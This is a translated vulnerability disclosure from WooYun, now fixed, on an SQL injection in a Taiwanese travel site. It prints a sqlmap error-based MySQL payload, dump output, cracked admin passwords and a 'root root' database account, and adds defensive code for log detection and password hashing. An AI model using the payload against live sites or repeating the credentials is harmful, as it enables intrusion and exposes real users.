
Vulnerability summary

Defect ID: wooyun-2015-0157949

Title: SQL injection on the main site of 清境旅遊資訊網 (DBA privileges / 17 databases involved / nearly 500 user accounts affected / MD5 hashes crackable) (Taiwan region)

Vendor: 清境旅遊資訊網

Author: 路人甲

Submitted: 2015-12-04 15:41

Fixed: 2016-01-05 19:11

Published: 2016-01-05 19:11

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed over to a third-party partner organisation (Hitcon, the Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-12-04: Details sent to the vendor, awaiting vendor handling
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and domain experts
2015-12-28: Details disclosed to regular white hats
2016-01-05: Vendor fixed the vulnerability and opted for public disclosure; details disclosed to the public

Brief description:

SQL injection on the main site of 清境旅遊資訊網 (DBA privileges / 17 databases involved / nearly 500 user accounts affected / MD5 hashes crackable)

Detailed description:

0x01
Injection point

http://**.**.**.**/sub/hotelview.asp?hno=182


Error-based injection (the injected query triggers an HTTP 500 response whose error text leaks data)



0x02
The database user is root

Place: GET
Parameter: hno
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: hno=182 AND (SELECT 3471 FROM(SELECT COUNT(*),CONCAT(0x3a7878793a
SELECT (CASE WHEN (3471=3471) THEN 1 ELSE 0 END)),0x3a716b6e3a,FLOOR(RAND(0)*2
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[13:19:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[13:19:35] [INFO] fetching current user
[13:19:36] [INFO] retrieved: root@localhost
current user: 'root@localhost'
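The sqlmap output above shows the classic MySQL error-based technique (a CONCAT/FLOOR(RAND(0)*2) subquery grouped over INFORMATION_SCHEMA that forces a duplicate-key error). As an added example, not part of the original report, here is detection logic that flags such requests in IIS W3C access logs. The log lines are constructed to mirror the report's hno parameter, and the field order assumed is the default IIS 6.0 W3C layout.

```python
import re
from urllib.parse import unquote_plus

# Markers that together characterise the FLOOR(RAND(0)*2) / GROUP BY
# duplicate-key trick behind the report's error-based payload.
ERROR_BASED_MARKERS = [
    re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    re.compile(r"group\s+by", re.I),
    re.compile(r"information_schema", re.I),
]

# Constructed IIS 6.0 W3C log lines (not from the report). Field order assumed:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip
# cs(User-Agent) sc-status sc-substatus sc-win32-status
SAMPLE_LOG = """\
2015-12-04 13:19:35 10.0.0.5 GET /sub/hotelview.asp hno=182 80 - 203.0.113.7 sqlmap/1.0 200 0 0
2015-12-04 13:19:36 10.0.0.5 GET /sub/hotelview.asp hno=182+AND+(SELECT+1+FROM(SELECT+COUNT(*),CONCAT(0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) 80 - 203.0.113.7 sqlmap/1.0 500 0 0
2015-12-04 13:20:01 10.0.0.5 GET /sub/hotelview.asp hno=183 80 - 198.51.100.9 Mozilla/5.0 200 0 0
"""

def parse_line(line):
    """Split one W3C line into the fields we need; None for comment/short lines."""
    f = line.split()
    if line.startswith("#") or len(f) < 13:
        return None
    return {"time": f"{f[0]} {f[1]}", "path": f[4], "query": unquote_plus(f[5]),
            "client": f[8], "status": int(f[10])}

def marker_count(query):
    """How many error-based markers the URL-decoded query string contains."""
    return sum(1 for p in ERROR_BASED_MARKERS if p.search(query))

def find_error_based_sqli(log_text, min_markers=2):
    """Return (client, path, status, markers) for each request that looks like
    error-based injection. A 500 alongside the markers is the strongest signal,
    since the technique works precisely by forcing a server-side SQL error."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and marker_count(rec["query"]) >= min_markers:
            hits.append((rec["client"], rec["path"], rec["status"],
                         marker_count(rec["query"])))
    return hits

if __name__ == "__main__":
    for hit in find_error_based_sqli(SAMPLE_LOG):
        print("suspicious request:", hit)
```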


0x03
And it has DBA privileges

[13:20:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[13:20:47] [INFO] testing if current user is DBA
[13:20:47] [INFO] fetching current user
[13:20:47] [INFO] resumed: root@localhost
[13:20:47] [INFO] retrieved: 1
current user is DBA: 'True'


0x04
17 databases involved

available databases [17]:
[*] cja
[*] db
[*] dbcount
[*] dbforguestbooks
[*] dbforhotel
[*] dbformb
[*] dbformbbooks
[*] dbforpanel
[*] dbforweb
[*] dbforwork
[*] download
[*] imagebooks
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] user


Affected users

Database: dbforhotel
[78 tables]


Table: login
[22 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| lAddress | varchar(255) |
| lBirthday | datetime |
| lCreatTime | datetime |
| lEarning | varchar(1) |
| lEducation | varchar(1) |
| lEmail | varchar(100) |
| lEnable | varchar(1) |
| lGender | varchar(1) |
| lHasChildren | varchar(1) |
| lHobby | varchar(2) |
| lLoginTime | datetime |
| lMarriage | varchar(1) |
| lMobile | varchar(25) |
| lName | varchar(100) |
| lNickname | varchar(10) |
| lNo | int(11) |
| lOccupation | varchar(2) |
| lPassword | varchar(32) |
| lSSN | varchar(10) |
| lssnRadio | varchar(1) |
| lSubscribe | varchar(1) |
| lTel | varchar(25) |
+--------------+--------------+


268 accounts, including email addresses, mobile numbers, addresses, and more

Database: dbforhotel
+-------+---------+
| Table | Entries |
+-------+---------+
| login | 146 |
+-------+---------+


+-------+---------+
| Table | Entries |
+-------+---------+
| login | 268 |
+-------+---------+


Database: cja
+---------+---------+
| Table | Entries |
+---------+---------+
| cjauser | 22 |
+---------+---------+




Part of the administrator user table (22 entries, with MD5 password hashes):



A couple picked at random and looked up on the cmd5 site: sunny rich230
arch arch
adm adm2006
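The hashes resolve on a lookup site because the application stores unsalted MD5 (the 32-character lPassword column). As an added example, not code from the report or the site, this shows the two defender-side consequences: equal passwords are visible as equal hashes without cracking anything, and the fix is a salted, iterated scheme with an at-login migration path. The user ids and passwords below are constructed.

```python
import hashlib
import hmac
import os

def md5_store(password):
    """Legacy scheme implied by a varchar(32) password column: unsalted MD5."""
    return hashlib.md5(password.encode()).hexdigest()

# Constructed sample rows (user id, stored hash); not from the report's dump.
LEGACY_ROWS = [
    ("502", md5_store("welcome1")),
    ("503", md5_store("welcome1")),
    ("504", md5_store("welcome1")),
    ("505", md5_store("different-pass")),
]

def shared_hash_groups(rows):
    """Map each hash used by more than one account to the accounts sharing it.
    With unsalted MD5 this exposes password reuse before any lookup is done."""
    by_hash = {}
    for uid, h in rows:
        by_hash.setdefault(h, []).append(uid)
    return {h: uids for h, uids in by_hash.items() if len(uids) > 1}

# Replacement scheme: salted PBKDF2-HMAC-SHA256 (600k iterations is a common
# current recommendation), stored as algo$iterations$salt$hash.
def pbkdf2_store(password, salt=None, iterations=600_000):
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def pbkdf2_verify(password, stored):
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

def migrate_row(uid, legacy_hash, password_at_login):
    """Upgrade one account at login time: the plaintext is only available then,
    and the upgrade happens only if it still matches the legacy MD5 value."""
    if not hmac.compare_digest(md5_store(password_at_login), legacy_hash):
        return None
    return (uid, pbkdf2_store(password_at_login))
```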
5 database users

[13:49:50] [INFO] retrieved: 5
Database: mysql
+-------+---------+
| Table | Entries |
+-------+---------+
| user | 5 |
+-------+---------+


Including:

root  root


0x05
There is also a file upload; I looked at it for a long time but could not work it out
http://**.**.**.**/tmpuugvi.asp




Proof of vulnerability:

Fix recommendation:

Copyright notice: credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-12-08 06:15

Vendor reply:

Thank you for the report

Latest status:

2016-01-05: Fix confirmed